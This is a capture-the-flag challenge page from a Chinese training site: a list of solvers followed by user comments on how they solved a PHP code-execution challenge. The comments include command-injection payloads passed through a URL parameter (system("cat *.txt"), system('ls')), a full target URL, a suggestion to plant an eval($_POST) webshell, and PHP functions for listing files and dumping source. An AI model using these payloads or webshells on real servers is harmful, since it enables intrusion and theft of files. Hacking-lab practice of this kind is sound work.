评分(10)
解题动态
jiandandian 攻破了该题 1天前
穹空丶悠远 攻破了该题 1天前
寒夜清风 攻破了该题 1天前
CD123456 攻破了该题 1天前
KamINanan 攻破了该题 2天前
xi24 攻破了该题 2天前
18171382569 攻破了该题 4天前
Jazz888 攻破了该题 5天前
雨季小朋友 攻破了该题 5天前
十里故清云 攻破了该题 6天前
gclome 攻破了该题 7天前
爆汁酸菜鱼 攻破了该题 7天前
潭影空人心 攻破了该题 7天前
2523822945 攻破了该题 7天前
qq1002517 攻破了该题 7天前
minakuu 攻破了该题 7天前
4n4n4n4n 攻破了该题 9天前
heart307 攻破了该题 10天前
15664977671 攻破了该题 10天前
评论
a2cai 4年前
举报
?我还以为作者要整条狗来看门呢,结果直接$_GET['s']=system('ls')就啥都出来了......
ximing 4年前
举报
根据描述应该应该是一个一句话木马,直接提交命令system(ls),然后在直接访问flag文件
shan 4年前
举报
用system(dir)来过这个题目,是作者本来的思路吗。看评论好像大家用的方法还挺多种的。
yinyue 4年前
举报
不多说了,套娃了解下
eleven 4年前
举报
?s=system("cat *.txt")
naihe567 4年前
举报
没法用POST的webshell,可以自己创建一个命令执行eval($_POST[‘xxx’]) 密码xxx
mantou 4年前
举报
http://114.67.246.176:18711/?s=system(%22cat%20xxxxxxxx.txt%22)
Y1rannn 4年前
举报
...没那么复杂啊,我直接s=system("")
pest 4年前
举报
除了菜刀,还可以利用print_r(glob("*.*")) scandir() //作用能扫描文件夹下的目录和文件,返回值为所有文件名组成的一个数组 show_source() //显示文件源码 highlight_file() //和show_source()函数是一个意思 我直接复制的一个大佬的wp过来的。
simpleboy 4年前
举报
解法还是很多的